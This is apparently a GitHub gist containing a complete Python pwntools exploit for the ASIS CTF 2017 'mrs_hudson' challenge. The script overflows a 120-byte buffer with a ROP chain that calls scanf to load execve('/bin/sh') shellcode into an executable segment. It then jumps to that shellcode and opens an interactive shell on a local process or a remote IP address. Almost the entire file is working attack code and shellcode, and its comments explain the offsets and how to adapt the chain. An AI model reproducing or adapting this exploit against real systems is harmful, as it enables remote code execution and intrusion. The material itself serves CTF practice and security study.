@bmphx2
Last active September 26, 2017 12:05
#!/usr/bin/python
from pwn import *
LOCAL = False  # True: spawn ./mrs._hudson locally; False: connect to the remote service (see main)
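def pwn():
    """Run the mrs_hudson exploit over the module-global ``target`` tube.

    Stage 1 overflows the 120-byte buffer with a ROP chain that calls
    ``scanf("%s", bin_x)`` and then returns into ``bin_x``.  Stage 2 feeds
    that scanf an execve("/bin/sh") shellcode, which is then executed --
    this only works because the segment at ``bin_x`` is executable on the
    target (NX off).  Finally the tube is handed to the user.

    Expects ``target`` (a pwntools tube) to have been set up by ``main``.
    """
    # Gadget / symbol addresses from the (non-PIE) challenge binary.
    pop_rsi = 0x00000000004006f1   # pop rsi; pop r15; ret
    pop_rdi = 0x004006f3           # pop rdi; ret
    scanf_plt = 0x00400526         # scanf@PLT
    scanf_string = 0x0040072b      # "%s" format string already in the binary
    bin_x = 0x0000000000601090     # rwx segment: scanf destination and jump target

    log.info("ASIS CTF 2017: mrs_hudson exploit - mphx2")
    # Byte literals throughout: the original str payloads worked on Python 2
    # only -- on Python 3, str + bytes raises and pwntools re-encodes str
    # with context.encoding, which would mangle the >0x7f shellcode bytes.
    target.recvuntil(b"Let's go back to 2000.")

    # scanf(rdi="%s", rsi=bin_x); 0xdeadbeef fills the r15 slot of the
    # pop_rsi gadget.  When scanf returns, the next ret lands in bin_x.
    rop = p64(pop_rdi)
    rop += p64(scanf_string)
    rop += p64(pop_rsi)
    rop += p64(bin_x) + p64(0xdeadbeef)
    rop += p64(scanf_plt)
    rop += p64(bin_x)
    # 120 bytes of padding reach the saved return address; sendline's
    # trailing '\n' terminates the vulnerable read.  NOTE(review): if that
    # read is the binary's own scanf("%s"), the chain must also avoid
    # whitespace bytes (0x09-0x0d, 0x20) -- every address above does.
    target.sendline(b"A" * 120 + rop)

    # Stage 2: consumed by our scanf("%s").  %s stops at whitespace and
    # NUL-terminates, so the shellcode must contain no whitespace bytes;
    # this one avoids them (and NULs) by building "/bin/sh\0" as neg(rbx).
    # Decoded: xor eax,eax; mov rbx,0xff978cd091969dd1; neg rbx; push rbx;
    # push rsp; pop rdi; cdq; push rdx; push rdi; push rsp; pop rsi;
    # mov al,59; syscall  => execve("/bin/sh", ["/bin/sh"], NULL).
    # NOTE(review): if scanf faults on a movaps, the stack is misaligned on
    # entry -- insert a bare `ret` gadget before scanf_plt to realign.
    shellcode = (
        b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb"
        b"\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
    )
    target.sendline(shellcode)
    target.interactive()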
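def main():
    """Open the target tube (local process or remote service) and run ``pwn``.

    ``LOCAL`` selects a local ``./mrs._hudson`` process; otherwise the
    original 2017 CTF endpoint is used, which is presumably no longer live.
    The tube is stored in the module-global ``target`` because ``pwn``
    reads it from there.  It is closed on the way out so an exception in
    ``pwn`` does not leave the child process or socket dangling.
    """
    global target
    if LOCAL:
        target = process("./mrs._hudson")
    else:
        target = remote("146.185.168.172", 8642)
    try:
        pwn()
    finally:
        target.close()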
if __name__ == "__main__":  # run the exploit only when executed as a script
    main()